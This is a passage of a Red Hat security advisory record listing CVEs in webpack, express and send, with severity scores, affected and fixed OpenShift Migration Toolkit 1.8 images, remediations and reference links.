"summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-43796", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:28.106254+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311152", }, ], notes: [ { category: "description", text: "A flaw was found in Express. This vulnerability allows untrusted code execution via passing untrusted user input to response.redirect(), even if the input is sanitized.", title: "Vulnerability description", }, { category: "summary", text: "express: Improper Input Handling in Express Redirects", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43796", }, { category: "external", summary: "RHBZ#2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43796", url: "https://www.cve.org/CVERecord?id=CVE-2024-43796", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43796", }, { category: "external", summary: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", url: "https://github.com/expressjs/express/commit/54271f69b511fea198471e6ff3400ab805d6b553", }, { category: "external", summary: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", url: "https://github.com/expressjs/express/security/advisories/GHSA-qw6h-vgh9-j6wx", }, ], release_date: "2024-09-10T15:15:17.510000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "express: Improper Input Handling in Express Redirects", }, { cve: "CVE-2024-43799", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:30.869487+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311153", }, ], notes: [ { category: "description", text: "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.", title: "Vulnerability description", }, { category: "summary", text: "send: Code Execution Vulnerability in Send Library", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], known_not_affected: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-12-10T01:37:19+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10906", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-ui-rhel8@sha256:ae3dc96aa16f80c2386daf976d0fc5a4b3501aa923342728a9d8020571adef47_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-velero-plugin-for-mtc-rhel8@sha256:777e10015629b4295ffd279e8e97945a25f3eae9619ce82f0238a277a529849b_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHMTC-1.8:rhmtc/openshift-migration-controller-rhel8@sha256:4657efd532ccf0e4d945e2d212d1022877a6da0d33dead66811c097d01842319_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-hook-runner-rhel8@sha256:567c14ac62514b8e60d2a8aaf49bd4666e0612f17ec3077a35849013cefbf8dc_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-log-reader-rhel8@sha256:4d78ea33f02d7b0de64b16c0dd58c67fbfafac3783948250eb5361c2b0d1fbed_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-must-gather-rhel8@sha256:252375b7e90707ee71d68b38ec5dcbe16c61188fecc723bcf7dd72944b80a6eb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-openvpn-rhel8@sha256:eab006db0ded34f36609011fab5bf1f02825149d74347837cd28dd9ed3cbcccf_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-operator-bundle@sha256:1ee51dfcf4fba81d24fed333657b241eec98d961e3e5d1549ba9d902237c5ecb_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-registry-rhel8@sha256:91a75a438ae32c7e0826c3d5aab25f2597812331b8911b040da7cb9a31a25007_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rhel8-operator@sha256:91ec7e1765d4ee8a808e1eede50c610c37deb3e78c9932f76b5c222d9a978e4c_amd64", "8Base-RHMTC-1.8:rhmtc/openshift-migration-rsync-transfer-rhel8@sha256:6e8e1c6c3db9ddf500d07e5f2453473e7dfe0bf0195aaa0ef11ed4c86ea58c31_amd64", 